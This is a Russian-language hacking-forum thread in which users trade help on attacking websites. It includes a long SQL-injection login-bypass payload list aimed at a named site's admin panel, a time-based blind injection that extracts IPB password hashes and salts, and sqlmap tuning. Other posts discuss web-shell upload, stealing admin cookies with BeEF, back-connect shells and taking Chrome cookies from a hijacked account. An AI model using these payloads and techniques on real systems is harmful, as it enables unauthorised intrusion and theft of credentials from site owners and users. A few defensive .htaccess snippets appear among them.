Господа, такой вопрос: есть инъекция, позволяющая выводить содержимое любой ячейки таблицы в поле формы на веб-странице (после "правильного" POST-запроса). Как можно слить через эту лазейку всю базу ? Структура таблиц базы известна. Есть ли тулза какая-то для этого или нужно самому писать скрипт ?

BabaDook
13.11.2017, 03:07
garrik said:
↑ (https://antichat.live/posts/4148997/)
Господа, такой вопрос: есть инъекция, позволяющая выводить содержимое любой ячейки таблицы в поле формы на веб-странице (после "правильного" POST-запроса). Как можно слить через эту лазейку всю базу ? Структура таблиц базы известна. Есть ли тулза какая-то для этого или нужно самому писать скрипт ?


sqlmap

gena ryzhov
25.11.2017, 05:01
Всем доброй ночи!

хочу вернуть доступ к консоли через веб шелл, ранее юзал mail(), а потом mb_send_mail(), их закрыли, уже все функции в доках перерыл, не нашел ничего, open_basedir от корня сайта и /tmp , через бд файлы не читаются

Собственно модули апача и список выключенных функций:

Loaded Apache modules: core, mod_so, http_core, mod_php5, mod_access_compat, mod_actions, mod_alias, mod_auth_basic, mod_authn_core, mod_authn_file, mod_authz_core, mod_authz_groupfile, mod_authz_host, mod_authz_user, mod_autoindex, mod_dir, mod_env, mod_filter, mod_headers, mod_include, mod_log_config, mod_logio, mod_mime, mod_negotiation, mod_remoteip, mod_rewrite, mod_setenvif, mod_status, mod_unixd, mod_userdir, mod_version, prefork, mod_ssl, mod_systemd, mod_cgi

Disabled PHP Functions: exec,system,passthru,shell_exec,popen,show_source, posix_getpwuid,posix_setuid,posix_uname,cmd,escape shellcmd,popen,proc_open,dbmopen,suexec,pcntl_exec ,phpinfo,php_uname,mail,mb_send_mail

Крик души! Если есть какие-нибудь варианты буду рад обсудить!

P.S.

Смотрю в сторону использования CGI , PERL, но ничего не смыслю в этом!

t0ma5
25.11.2017, 05:59
gena ryzhov said:
↑ (https://antichat.live/posts/4153193/)
Всем доброй ночи!
хочу вернуть доступ к консоли через веб шелл, ранее юзал mail(), а потом mb_send_mail(), их закрыли, уже все функции в доках перерыл, не нашел ничего, open_basedir от корня сайта и /tmp , через бд файлы не читаются
Собственно модули апача и список выключенных функций:
Loaded Apache modules: core, mod_so, http_core, mod_php5, mod_access_compat, mod_actions, mod_alias, mod_auth_basic, mod_authn_core, mod_authn_file, mod_authz_core, mod_authz_groupfile, mod_authz_host, mod_authz_user, mod_autoindex, mod_dir, mod_env, mod_filter, mod_headers, mod_include, mod_log_config, mod_logio, mod_mime, mod_negotiation, mod_remoteip, mod_rewrite, mod_setenvif, mod_status, mod_unixd, mod_userdir, mod_version, prefork, mod_ssl, mod_systemd, mod_cgi
Disabled PHP Functions: exec,system,passthru,shell_exec,popen,show_source, posix_getpwuid,posix_setuid,posix_uname,cmd,escape shellcmd,popen,proc_open,dbmopen,suexec,pcntl_exec ,phpinfo,php_uname,mail,mb_send_mail
Крик души! Если есть какие-нибудь варианты буду рад обсудить!
P.S.
Смотрю в сторону использования CGI , PERL, но ничего не смыслю в этом!


это как будто викторина без конца, по ключевым словам вопрос гуглится очень хорошо, если ты перепробуешь то что уже придумано, и это не работает, то стоит подкорректировать вопрос упомянув что уже было испробовано

MyNameIsWhoIsWho
28.11.2017, 12:22
Ребят подскажите, нашел файл аплоад, но хз как отправить файл пост запросом)

Хтмл формы для заливки нет.

Как мне вообще создать запрос на отправку файла? И чем его отправить?

Знаю что тупой вопрос, но почему то всегда игнорировал эту тему а теперь пришлось столкнуться

Или ткните носом в инфу, полистал форум с гуглом, что-то не нашел

Gorev
28.11.2017, 12:26
MyNameIsWhoIsWho said:
↑ (https://antichat.live/posts/4154354/)
Ребят подскажите, нашел файл аплоад, но хз как отправить файл пост запросом)
Хтмл формы для заливки нет.
Как мне вообще создать запрос на отправку файла? И чем его отправить?
Знаю что тупой вопрос, но почему то всегда игнорировал эту тему а теперь пришлось столкнуться
Или ткните носом в инфу, полистал форум с гуглом, что-то не нашел


Плагином для лисы

MyNameIsWhoIsWho
28.11.2017, 12:31
BabaDook said:
↑ (https://antichat.live/posts/4154358/)
Вы уверены что файл рабочий, в крации вам нужен параметр, его можно прочитать, или угадать, ткните пальцем в небо и быть может вы попадёте в звезду зелёного цвета. Надеюсь я достаточно ясно объяснил на сколько это реально сделать


Ничего не понял.

Есть пхп скрипт, где загрузка файла не фильтруется. Параметр для пост запроса я знаю, просто пост запрос знаю как отправлять, но не знаю как отправлять файл пост запросом скрипту без хтмл формы

MotherHacker
28.11.2017, 14:12
MyNameIsWhoIsWho said:
↑ (https://antichat.live/posts/4154359/)
Ничего не понял.
Есть пхп скрипт, где загрузка файла не фильтруется. Параметр для пост запроса я знаю, просто пост запрос знаю как отправлять, но не знаю как отправлять файл пост запросом скрипту без хтмл формы


Создаёшь файл на рабочем столе index.html

Открываешь файл и пишешь:


HTML:


Затем открываешь index.html в браузере

gena ryzhov
29.11.2017, 01:57
MotherHacker said:
↑ (https://antichat.live/posts/4154398/)
Создаёшь файл на рабочем столе index.html
Открываешь файл и пишешь:

HTML:


Затем открываешь index.html в браузере



http://htmlbook.ru/html/form/enctype

MyNameIsWhoIsWho
29.11.2017, 07:21
gena ryzhov said:
↑ (https://antichat.live/posts/4154583/)

http://htmlbook.ru/html/form/enctype



Я вкурсе, спасибо)

Мне надо это было под массы заточить и отследить сам запрос, а не по одному ручками сидеть отправлять)

Другой вопрос. Вот это добро можно как то привести в человеческий вид? Чтоб код читабельный был.

http://clip2net.com/s/3PSUKqs

MotherHacker
29.11.2017, 12:10
MyNameIsWhoIsWho said:
↑ (https://antichat.live/posts/4154608/)
Другой вопрос. Вот это добро можно как то привести в человеческий вид? Чтоб код читабельный был.
http://clip2net.com/s/3PSUKqs


Всё можно

https://goo.gl/VneRw3

BabaDook
29.11.2017, 23:13
Вась. Я тебя не понимаю, у тебя вопросы вообще адовые. Тебя так не помогут

Octavian
02.12.2017, 17:44
Можно сделать проверку Referer через .htaccess дабы получить защиту от CSRF ?

Muracha
02.12.2017, 20:06
Вот таой замечательный сайт

.SpoilerTarget" type="button">Spoiler: 1
cyber-cafe.ru/admin/
вбить admin: admin - и тебе скажет, что нет логина и пароля. Есть вбить комбинации в сплойлере - выходит ошибка синтакс еррор. Вопрос к знатокам: действительно ли не получится авторизоваться, или нужен другой вектор?

Или иногда ошибка бывает простой ошибкой без возможности авторизации?

.SpoilerTarget" type="button">Spoiler: 2
or 1=1

or 1=1--

or 1=1#

or 1=1/*

admin' --

admin' #

admin'/*

admin' or '1'='1

admin' or '1'='1'--

admin' or '1'='1'#

admin' or '1'='1'/*

admin'or 1=1 or ''='

admin' or 1=1

admin' or 1=1--

admin' or 1=1#

admin' or 1=1/*

admin') or ('1'='1

admin') or ('1'='1'--

admin') or ('1'='1'#

admin') or ('1'='1'/*

admin') or '1'='1

admin') or '1'='1'--

admin') or '1'='1'#

admin') or '1'='1'/*

1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055

admin" --

admin" #

admin"/*

admin" or "1"="1

admin" or "1"="1"--

admin" or "1"="1"#

admin" or "1"="1"/*

admin"or 1=1 or ""="

admin" or 1=1

admin" or 1=1--

admin" or 1=1#

admin" or 1=1/*

admin") or ("1"="1

admin") or ("1"="1"--

admin") or ("1"="1"#

admin") or ("1"="1"/*

admin") or "1"="1

admin") or "1"="1"--

admin") or "1"="1"#

admin") or "1"="1"/*

1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

crlf
02.12.2017, 20:15
Octavian said:
↑ (https://antichat.live/posts/4155917/)
Можно сделать проверку Referer через .htaccess дабы получить защиту от CSRF ?




Code:
RewriteEngine On
RewriteCond %{HTTP_REFERER} !^http(s)?://(www\.)?site.com/.*
RewriteRule .* - [F]

Octavian
02.12.2017, 22:30
Что я сделол неправильно


Code:


RewriteEngine On
RewriteCond %{HTTP_REFERER} !^http(s)?://(www\.)?localhost/.*
RewriteRule .* - [F]

crlf
03.12.2017, 00:28
Directory нельзя использовать в .htaccess, только в конфигурационном файле.

Вот так можно попробовать:


Code:

RewriteEngine On
RewriteCond %{HTTP_REFERER} !^http(s)?://(www\.)?site.com/.*
RewriteRule .* - [F]

johncena55
03.12.2017, 05:39
Помогите пожалуйста.

Нашел DB, нашел в ней таблицы, но при попытке найти колонны, соглашаюсь на поиск через файл перебором, выставляю 1 поток, но он очень быстро прогоняет и затем крашится. Снова можно эксплуатировать примерно через час, пытался загрузить прокси, не помогло. Может кто то сталкивался с этим? Еще нет DB Information_schema. Может тоже влияет на это?

.SpoilerTarget" type="button">Spoiler: screenshots
http://prntscr.com/hicbz6 , http://prntscr.com/hiccg8

Gorev
03.12.2017, 05:46
johncena55 said:
↑ (https://antichat.live/posts/4156026/)
Помогите пожалуйста.
Нашел DB, нашел в ней таблицы, но при попытке найти колонны, соглашаюсь на поиск через файл перебором, выставляю 1 поток, но он очень быстро прогоняет и затем крашится. Снова можно эксплуатировать примерно через час, пытался загрузить прокси, не помогло. Может кто то сталкивался с этим? Еще нет DB Information_schema. Может тоже влияет на это?
Spoiler: screenshots
http://prntscr.com/hicbz6
,
http://prntscr.com/hiccg8


вручную пробовал?

johncena55
03.12.2017, 06:44
Gorev said:
↑ (https://antichat.live/posts/4156027/)
вручную пробовал?


Сделал только что так: вписал в текстовик только (email, password). Кастомный перебор, нашел эти 2 колонки. Краш прекратился, но попробовал дамп, получил ошибку..

Названия нашлись, а вот нумерации нет, что это значит?

.SpoilerTarget" type="button">Spoiler: screenshot
https://prnt.sc/hictfm

Gorev
03.12.2017, 10:07
johncena55 said:
↑ (https://antichat.live/posts/4156029/)
Сделал только что так: вписал в текстовик только (email, password). Кастомный перебор, нашел эти 2 колонки. Краш прекратился, но попробовал дамп, получил ошибку..
Названия нашлись, а вот нумерации нет, что это значит?
Spoiler: screenshot
https://prnt.sc/hictfm


Вручную в браузере! Попробуй dios запрос для дампа.

serg1234
04.12.2017, 17:01
Подскажите, пожалуйста, как такое можно побороть и чем.

делаю запрос:

http:///recover.view?query=query+and+1=1+--+

возвращается ответ с ошибкой:

internal error.

Exception java.lang.NullPointerException

Message null

Java version Oracle Corporation 1.7.0_151

Operating system Linux 4.10.0-19-generic

Server jetty-6.1.x

Memory Used 140 of 509 MB

Stack trace java.lang.NullPointerException

пробовал подставлять другие sql-инъекции - ответ такой же.

sqlmap тоже ничем не помог.

подскажите в какую сторону рыть?

SSSmith
05.12.2017, 14:37
Кто разбирается в расширениях хром? Есть доступ к аккаунту хрома, нужно вытащить инфу(куки) возможно? Смотрю в сторону установки расширений. Могу сделать синхронизацию.

MotherHacker
05.12.2017, 22:04
SSSmith said:
↑ (https://antichat.live/posts/4157057/)
Кто разбирается в расширениях хром? Есть доступ к аккаунту хрома, нужно вытащить инфу(куки) возможно? Смотрю в сторону установки расширений. Могу сделать синхронизацию.


Если я правильно понял, content scripts. Вставляет указанный js файл в код сайта.

Octavian
05.12.2017, 23:58
Может быть такое чтоб открылось XSS уязвимость несмотря на использование


Code:
htmlspecialchars()
htmlentities()

Если да то можно примеры?

Например тут можно делать инекцыю?


Code:

Muracha
14.12.2017, 03:11
В БД пароль обозначен так:


Code:
‘Љ‹0ы1Г

- ине только он один, а вся таблица.

Как расшифровать каракатицу и чем? Для примера:


Code:
-nж 5мЇгҐ¶Q§



Code:
t2Ж•\\s‘ГК2В

Gorev
14.12.2017, 09:47
Muracha said:
↑ (https://antichat.live/posts/4160754/)
В БД пароль обозначен так:

Code:
‘Љ‹0ы1Г

- ине только он один, а вся таблица.
Как расшифровать каракатицу и чем? Для примера:

Code:
-nж 5мЇгҐ¶Q§


Code:
t2Ж•\\s‘ГК2В



Ты вручную так вывел инфу из бд ?

Muracha
14.12.2017, 15:04
Gorev said:
↑ (https://antichat.live/posts/4160783/)
Ты вручную так вывел инфу из бд ?


да, позже я нашел скрипт, который вбивает это в БД - все же это в раздел криптографии.

blackbox
15.12.2017, 11:24
Скажите, тут prepared statements и ничего сделать нельзя или есть варианты? Вывод ошибки: https://pastebin.com/19DdVy7f

И второй вопрос, есть доступ к переменной, которая участвует в sql запросе:

Но она обрабатыввается такой функцией. В итоге все скобки в запросе у меня отфильтровались. Что можно сделать?


Code:
function key_check($key) {
if ($key == '') { return ''; }
$key = preg_replace("/[^\w\xB2-\xB4\xBF-\xFF\xA5\xA8\xAA\xAF\xB8\xBA\s]/", "", $key );
if ($key =='_SERVER' OR $key =='_SESSION' OR $key =='_FILES' OR $key =='_REQUEST' OR $key =='GLOBALS') die("Error variable ".basename(__FILE__)." ".__LINE__."");
else return $key;
}

Octavian
21.12.2017, 02:50
как зменить код ответа


Code:
HTTP/1.1 403 Forbidden

на


Code:
HTTP/1.1 404 Not Found

через htaccess

просто если даже делаю так


Code:
ErrorDocument 401 /erorr.html
ErrorDocument 404 /erorr.html
ErrorDocument 500 /erorr.html
ErrorDocument 403 /erorr.html

сканер видит по ответу что у меня есть такои директории /admin/ckeditor/ итд.

grimnir
21.12.2017, 13:17
возможно так заработает

ErrorDocument 404 /errors/404_redirect.php


Code:


ErrorDocument 403 /404.php


Code:




Code:
RewriteEngine On

RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^ - [L,R=404]

Diego228
23.12.2017, 01:15
Есть ли какие то способы заливки шелла для IPB 4.2?

Octavian
26.12.2017, 02:23
Помогите понять что попадает в параметре template=


Code:
POST /upload/?template=8849c262187451b5f558f4c2f150ec67efaafc19 2f51b1b8983754090e0c767bb%2B5SL0SVpqqHUB7zPYvNzEMS anK9r2uL7xUe%2FTK%2B9rofXD6gqQpsIKB2P7aECihmfEwEdQ aLG6Kz3W5B1wiwxZRbdutdBbRYClAAoZ%2FbhaTdm2VnPBVZKu isi3cVVM91p2%2Fpjb%2FqSPor7%2F026fq9PitSBizAtSbf85 8%2FBcTu7sw%3DH2pFMj%2BuoRaSnqqPdNbdrZzh3AF9H0uhag E9V7R6V8Ed67HFvGYS%2FCg9DReGtlj1n1HtjpV14qqfYt5l%2 FtVesG2B%2FXh84tkr14t%2FRgTUA7cXwn3bWEWUcjxCFWlmAs 2RXLs6g1Up3e%2Fg4rolmGO8JAbFwRXWhFQQvZMx1%2BD5tjM% 3DTie6y7lK%2Fq6Vlw9ssVYUYDP5Il5dYZxGPtkJSkaOPNGjki n81azLZFdtU7K6wUBcHYOoZzhthYdFMIK8K30UMGPMQI9%2Fd4 AKJsATT1PXaw%2FA1bjkMnapCdJl4IWGNs55IgHEs6mMPENlBu VodjQXJNodIkXOFa%2BI%2Bq%2BMlGu0Rls%3D HTTP/1.1



Code:
/upload/?template=3e7a792a56f73e65a69d106dc937b900c21794cd d870480ccdf1703f705c3190CZuXC41C79ucpR7ux0R8iRkUg2 iadWk4ZAfJsKydlbETDNhV%2B3kMjiatmsMvXttCDpHmndniTF h6rcH4A7Cx6kwnj1jqNtPx%2FrmnG%2BtK15L9X6o%2FBYRnb8 WBm%2BkZY%2FQPq2xnQekesyQVY4Ht2wtqnCqwLajg9VcRe1XI ivwy1G4%3D

grimnir
26.12.2017, 17:46
Octavian said:
↑ (https://antichat.live/posts/4165649/)
Помогите понять что попадает в параметре template=

Code:
POST /upload/?template=8849c262187451b5f558f4c2f150ec67efaafc19 2f51b1b8983754090e0c767bb%2B5SL0SVpqqHUB7zPYvNzEMS anK9r2uL7xUe%2FTK%2B9rofXD6gqQpsIKB2P7aECihmfEwEdQ aLG6Kz3W5B1wiwxZRbdutdBbRYClAAoZ%2FbhaTdm2VnPBVZKu isi3cVVM91p2%2Fpjb%2FqSPor7%2F026fq9PitSBizAtSbf85 8%2FBcTu7sw%3DH2pFMj%2BuoRaSnqqPdNbdrZzh3AF9H0uhag E9V7R6V8Ed67HFvGYS%2FCg9DReGtlj1n1HtjpV14qqfYt5l%2 FtVesG2B%2FXh84tkr14t%2FRgTUA7cXwn3bWEWUcjxCFWlmAs 2RXLs6g1Up3e%2Fg4rolmGO8JAbFwRXWhFQQvZMx1%2BD5tjM% 3DTie6y7lK%2Fq6Vlw9ssVYUYDP5Il5dYZxGPtkJSkaOPNGjki n81azLZFdtU7K6wUBcHYOoZzhthYdFMIK8K30UMGPMQI9%2Fd4 AKJsATT1PXaw%2FA1bjkMnapCdJl4IWGNs55IgHEs6mMPENlBu VodjQXJNodIkXOFa%2BI%2Bq%2BMlGu0Rls%3D HTTP/1.1


Code:
/upload/?template=3e7a792a56f73e65a69d106dc937b900c21794cd d870480ccdf1703f705c3190CZuXC41C79ucpR7ux0R8iRkUg2 iadWk4ZAfJsKydlbETDNhV%2B3kMjiatmsMvXttCDpHmndniTF h6rcH4A7Cx6kwnj1jqNtPx%2FrmnG%2BtK15L9X6o%2FBYRnb8 WBm%2BkZY%2FQPq2xnQekesyQVY4Ht2wtqnCqwLajg9VcRe1XI ivwy1G4%3D



больше бы информации ,что за движок и т.д https://builtwith.com https://www.larger.io

Octavian
26.12.2017, 21:19
Саит загружает картинки с названием


Code:
2441514308688-asd.php.jpg

как я могу збросить .jpg

Пробовал


Code:
2441514308688-asd.php%00.jpg
2441514308688-asd.php\n.jpg
2441514308688-asd.php;.jpg

BabaDook
26.12.2017, 21:23
https://i.simpalsmedia.com/upload/?template=

Octavian
26.12.2017, 21:35
BabaDook said:
↑ (https://antichat.live/posts/4165945/)
https://i.simpalsmedia.com/upload/?template=


Я зарепортил исправили

karkajoi
26.12.2017, 22:54
Добрый день, подскажите инструменты для проведения time based blind injection. Мапа и марковка не видят, руками до 2го пришествия можно крутить((

Alexandr17
26.12.2017, 23:18
karkajoi said:
↑ (https://antichat.live/posts/4166016/)
Добрый день, подскажите инструменты для проведения time based blind injection. Мапа и марковка не видят, руками до 2го пришествия можно крутить((


based blind Havij не возьмет. Просканируй Burpsuite на наличие уязвимости или Acunetix. Может не точный параметр сканер определил из-за этого не видит уязвимость скульмап

karkajoi
26.12.2017, 23:36
Alexandr17 said:
↑ (https://antichat.live/posts/4166022/)
based blind Havij не возьмет. Просканируй Burpsuite на наличие уязвимости или Acunetix. Может не точный параметр сканер определил из-за этого не видит уязвимость скульмап


Нет,руками крутится

Alexandr17
26.12.2017, 23:44
Если руками крутится значит и сульмап должен видеть. Ему надо точный параметр. В таргете что-то не так

Octavian
26.12.2017, 23:47
karkajoi said:
↑ (https://antichat.live/posts/4166028/)
Нет,руками крутится


Пробуи


Code:
--level=3 --risk=3 --user-agent

Alexandr17
26.12.2017, 23:51
Octavian said:
↑ (https://antichat.live/posts/4166035/)
Пробуи

Code:
--level=3 --risk=3 --user-agent



based blind без этих значений мап не увидит уязвимость. Так что обязательно надо подставлять. А там уже и темперы по надобности

Alexandr17
27.12.2017, 00:22
ms13 said:
↑ (https://antichat.live/posts/4166047/)
????
Что за бред...


Ну хз... У меня лично без этих значений не видел мап уязвимости based blind, ни по GET и POST параметру

grimnir
27.12.2017, 00:46
karkajoi said:
↑ (https://antichat.live/posts/4166028/)
Нет,руками крутится


sqlmap

https://github.com/ron190/jsql-injection

https://github.com/alessiovierti/blindpie

https://github.com/awnumar/blind-sql-bitshifting

https://github.com/missDronio/blindy

karkajoi
27.12.2017, 03:30
grimnir said:
↑ (https://antichat.live/posts/4166054/)
sqlmap
https://github.com/ron190/jsql-injection
https://github.com/alessiovierti/blindpie
https://github.com/awnumar/blind-sql-bitshifting
https://github.com/missDronio/blindy


Не помогло(( Мапа на отрез отказывается видеть, марковка хоть как-то реагирует, мапа тупо игнорить. Какие ещё есть варианты ?

Alexandr17
27.12.2017, 11:00
karkajoi said:
↑ (https://antichat.live/posts/4166100/)
Не помогло(( Мапа на отрез отказывается видеть, марковка хоть как-то реагирует, мапа тупо игнорить. Какие ещё есть варианты ?


Есть еще SQLI Dumper. Пихай скулю в него. Может получиться. Но почему мап не видет тут загадка. Я думаю что в таргете что-то не так. Тебе нужно просканировать бурпом. И результаты с него кинуть в мап. Я так понял у тебя по GET запросу скуля? Подставляй значение --level=5 --risk=3 --space2comment --random-agent и потоки выставь на минимум. Пробуй менять значение. Если по POST запросу скуля, то Дампером и не пробуй даже

karkajoi
27.12.2017, 12:10
Мапой добился вывода имена БД , Mysql 5+, таблицы выводить не хочет , начинает брутфорсить и ничего не находит, думаю там префикс не стандартный который надо узнать, двигло IPB, дефолтные талицы не подхоят

Alexandr17
27.12.2017, 13:13
karkajoi said:
↑ (https://antichat.live/posts/4166197/)
Мапой добился вывода имена БД , Mysql 5+, таблицы выводить не хочет , начинает брутфорсить и ничего не находит, думаю там префикс не стандартный который надо узнать, двигло IPB, дефолтные талицы не подхоят


Делай дамп БД без вывода таблиц

karkajoi
27.12.2017, 14:29
Выдрал талицу, вектор вот такой(оказалось вот такой префикс ibf_)


Code:
and (select sleep(5) from dual where (select members_pass_salt from ibf_members where name like '%Wilda%' limit 0,1) like '______')-- -' True

and (select sleep(5) from dual where (select members_pass_hash from ibf_members where name like '%Wilda%' limit 0,1) like '________________________________')-- -' True

Из чего следует что соль будет 5 символов, а хєш пароля 32

Вопрос,я понял что теперь остается брутить символы, только как узнать правильную их последовательность?

Octavian
27.12.2017, 20:23
Есть саит которыи позволяет загружать .php фаилы которые доступны админу он их открывает(проверил отправив svg с js-ом) но у меня в тои директории нету доступа по IP (Forbided), вопрос что можно отправить ему в php фаиле чтоб получить доступ после выполнение(нужно максимально все варианты запихнуть в php шанс думаю будет 1)?

PS. Одна из идеи было переписать .htaccess

karkajoi
27.12.2017, 20:48
Octavian said:
↑ (https://antichat.live/posts/4166451/)
Есть саит которыи позволяет загружать .php фаилы которые доступны админу он их открывает(проверил отправив svg с js-ом) но у меня в тои директории нету доступа по IP (Forbided), вопрос что можно отправить ему в php фаиле чтоб получить доступ после выполнение(нужно максимально все варианты запихнуть в php шанс думаю будет 1)?
PS. Одна из идеи было переписать .htaccess


записать в файл Можно замаскировать в base64, или посмотреть ещё вариаты минишелов, которые менее всего привлекают внимания. Есть ещё варианты, но надо знать локальный путь

Octavian
27.12.2017, 20:52
karkajoi said:
↑ (https://antichat.live/posts/4166458/)
записать в файл Можно замаскировать в base64, или посмотреть ещё вариаты минишелов, которые менее всего привлекают внимания. Есть ещё варианты, но надо знать локальный путь


Ты внимательно читаи знаеш что твкое IP?

karkajoi
27.12.2017, 23:20
Octavian said:
↑ (https://antichat.live/posts/4166460/)
Ты внимательно читаи знаеш что твкое IP?


Значит ищи раскрытие путей, и заливай мини шел через php файл

zifus
28.12.2017, 00:15
Octavian said:
↑ (https://antichat.live/posts/4166451/)
Есть саит которыи позволяет загружать .php фаилы которые доступны админу он их открывает(проверил отправив svg с js-ом) но у меня в тои директории нету доступа по IP (Forbided), вопрос что можно отправить ему в php фаиле чтоб получить доступ после выполнение(нужно максимально все варианты запихнуть в php шанс думаю будет 1)?
PS. Одна из идеи было переписать .htaccess


Как вариант beef, суешь в PHP hook.js, и куки админа твои... Или по обстоятельствах.

Octavian
28.12.2017, 04:37
karkajoi said:
↑ (https://antichat.live/posts/4166522/)
Значит ищи раскрытие путей, и заливай мини шел через php файл


_

Octavian
28.12.2017, 04:38
zifus said:
↑ (https://antichat.live/posts/4166551/)
Как вариант beef, суешь в PHP hook.js, и куки админа твои... Или по обстоятельствах.


Ты внимательно читаи знаеш что твкое IP?+(проверил отправив svg с js-ом) я отправив js получял уже куки и там по кукам видно что ораничения по IP )

crlf
28.12.2017, 17:01
Octavian said:
↑ (https://antichat.live/posts/4166451/)
Есть саит которыи позволяет загружать .php фаилы которые доступны админу он их открывает(проверил отправив svg с js-ом) но у меня в тои директории нету доступа по IP (Forbided), вопрос что можно отправить ему в php фаиле чтоб получить доступ после выполнение(нужно максимально все варианты запихнуть в php шанс думаю будет 1)?
PS. Одна из идеи было переписать .htaccess


Бекконнект как вариант, далее по обстоятельствам.

Octavian
30.12.2017, 17:50
Где я могу наить отдельно все комбинацыии из для Bruteforce


Code:
4 цыфр
5 цыфр
6 цыфр
7 цыфр
8 цыфр
9 цыфр
10 цыфр

grimnir
30.12.2017, 19:36
Octavian said:
↑ (https://antichat.live/posts/4167468/)
Где я могу наить отдельно все комбинацыии из для Bruteforce

Code:
4 цыфр
5 цыфр
6 цыфр
7 цыфр
8 цыфр
9 цыфр
10 цыфр



сгенерировать самому через http://unifiedlm.com/Download или PasswordsPro /Если верно помню 10 цифр будет весить 111 Гб

Octavian
30.12.2017, 19:47
grimnir said:
↑ (https://antichat.live/posts/4167505/)
сгенерировать самому через
http://unifiedlm.com/Download
или PasswordsPro /Если верно помню 10 цифр будет весить 111 Гб


+ вопрос как мог выполнется запрос если он меняет HOST ?


Code:
https://hackerone.com/reports/226659

BabaDook
30.12.2017, 20:29
Octavian said:
↑ (https://antichat.live/posts/4167515/)
+ вопрос как мог выполнется запрос если он меняет HOST ?

Code:
https://hackerone.com/reports/226659



Ну ты прочитай

Octavian
30.12.2017, 20:59
Немогу некак понять Host Header Atack что я не совал в Host: ничего не меняется в [SERVER_NAME] и [HTTP_HOST] инструкцию брал


Code:
https://habrahabr.ru/post/166855/

https://image.ibb.co/cKNOjw/image.jpg

BabaDook
30.12.2017, 21:07
Я просто не понимаю, какой результат ты ожидаешь

Octavian
30.12.2017, 21:20
BabaDook said:
↑ (https://antichat.live/posts/4167534/)
Я просто не понимаю, какой результат ты ожидаешь


Чтоб одна из переменых [SERVER_NAME] и [HTTP_HOST] поменялась на ok.ru как на фото

С https://habrahabr.ru/post/166855/


Code:
Оправляем
GET http://site.dev/phpinfo.php HTTP/1.1
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Charset:windows-1251,utf-8;q=0.7,*;q=0.3
Accept-Language:ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Cache-Control:max-age=0
Connection:keep-alive
Host:~%#$^&*()<>?@\!."'{}[]=+|
Referer:http://site.dev/index.htm
User-Agent:TelnetTest

И смотрим:
_SERVER["SERVER_NAME"]: ~%#$^&*()<>?@\!."'{}[]=+|
_SERVER["HTTP_HOST"]: ~%#$^&*()<>?@\!."'{}[]=+|

grimnir
30.12.2017, 21:52
Octavian said:
↑ (https://antichat.live/posts/4167538/)
Чтоб одна из переменых [SERVER_NAME] и [HTTP_HOST] поменялась на ok.ru как на фото
С
https://habrahabr.ru/post/166855/

Code:
Оправляем
GET http://site.dev/phpinfo.php HTTP/1.1
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Charset:windows-1251,utf-8;q=0.7,*;q=0.3
Accept-Language:ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Cache-Control:max-age=0
Connection:keep-alive
Host:~%#$^&*()<>?@\!."'{}[]=+|
Referer:http://site.dev/index.htm
User-Agent:TelnetTest

И смотрим:
_SERVER["SERVER_NAME"]: ~%#$^&*()<>?@\!."'{}[]=+|
_SERVER["HTTP_HOST"]: ~%#$^&*()<>?@\!."'{}[]=+|



https://vlevit.org/ru/blog/tech/host-spoofing-prevention

http://rus-linux.net/MyLDP/server/securing-apache-part-5-http-message-architecture.html

http://nginx.org/en/docs/http/request_processing.html

Alexandr17
31.12.2017, 01:13
BabaDook said:
↑ (https://antichat.live/posts/4167534/)
Я просто не понимаю, какой результат ты ожидаешь


Годно. Побольше бы таких гайдов по бурпу. Программа многофункциональная. С одной теорией мне лично сложновато понять полный функционал. Особенно фаззинг и так далее...

BabaDook
31.12.2017, 01:48
Alexandr17 said:
↑ (https://antichat.live/posts/4167665/)
Годно. Побольше бы таких гайдов по бурпу. Программа многофункциональная. С одной теорией мне лично сложновато понять полный функционал. Особенно фаззинг и так далее...


Так есть же гайд по бурпу

/threads/servis-staty-po-realpazam.452520/#post-4124151 (https://antichat.live/threads/servis-staty-po-realpazam.452520/)

Octavian
03.01.2018, 00:59
Делаю простую XSS которая внедряется но выдает ошибку в Console


Code:
Uncaught ReferenceError: PROMPT is not defined
at profile:107

Zen1T21
03.01.2018, 07:06
Octavian said:
↑ (https://antichat.live/posts/4168697/)
Делаю простую XSS которая внедряется но выдает ошибку в Console

Code:
Uncaught ReferenceError: PROMPT is not defined
at profile:107



Привычка капсом все писать? Попробуй prompt

Octavian
03.01.2018, 18:19
Zen1T21 said:
↑ (https://antichat.live/posts/4168749/)
Привычка капсом все писать? Попробуй prompt


Да точно дело в пробеле просто думал что регистр не важен, саит сам переделол в большои регистр

Octavian
03.01.2018, 22:10
У меня такои сплоит не работает https://xakep.ru/2017/01/12/phpmailer-exploit/ или в новои версии PHP исправили?


Code:

grimnir
03.01.2018, 22:58
Octavian said:
↑ (https://antichat.live/posts/4168950/)
У меня такои сплоит не работает
https://xakep.ru/2017/01/12/phpmailer-exploit/
или в новои версии PHP исправили?

Code:




который без патча [B][SIZE="5"]PHPMailer

Octavian
03.01.2018, 23:07
[QUOTE="grimnir"]
grimnir said:
↑ (https://antichat.live/posts/4168961/)
который без патча
[B][SIZE="5"]PHPMailer

crlf
04.01.2018, 03:17
Octavian said:
↑ (https://antichat.live/posts/4168950/)
У меня такои сплоит не работает
https://xakep.ru/2017/01/12/phpmailer-exploit/


Где у тебя? Какой MTA установлен? К примеру, postfix не поддерживает -X.


Octavian said:
↑ (https://antichat.live/posts/4168950/)
или в новои версии PHP исправили?


Это не баг, это фича.

r0
06.01.2018, 02:59
Наткнулся на одном сервере на Apache Tomcat 8.5.23 - перед глазами страница с радостной надписью, что сервер успешно установлен.

Доступ к


Code:
/manager/html
/host-manager/html
/manager/status

Заблочен - я так понял по быстрому чтению доков - заблочен из коробки во имя безопасности.

Но чутью зверя подсказывает, что нерадивый одмен забыл/забил на конфигурацию и как-то это можно раскрутить.

Можно ли, уважаемые знатоки? Прошу вектор.

Octavian
13.01.2018, 03:54
Получил доступ к чтению фаилов но не могу добратся до конфига Laravel, помогите приватно

ShpillyWilly
13.01.2018, 18:10
Товарищи, помогите пллз.

